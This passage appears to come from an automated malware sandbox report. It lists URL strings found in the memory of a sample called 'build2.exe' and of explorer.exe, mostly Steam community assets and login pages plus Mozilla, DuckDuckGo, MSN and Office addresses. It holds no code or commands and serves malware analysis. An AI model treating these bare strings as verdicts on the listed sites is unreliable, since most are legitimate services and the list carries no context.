Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: build2.exe, 00000013.00000003.2210740943.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000001.00000000.1692249717.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2706345491.000000000900D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000001.00000000.1692249717.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: explorer.exe, 00000001.00000000.1692249717.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 0000002A.00000003.2707064136.0000000008FE5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2710133432.0000000008FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comen
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
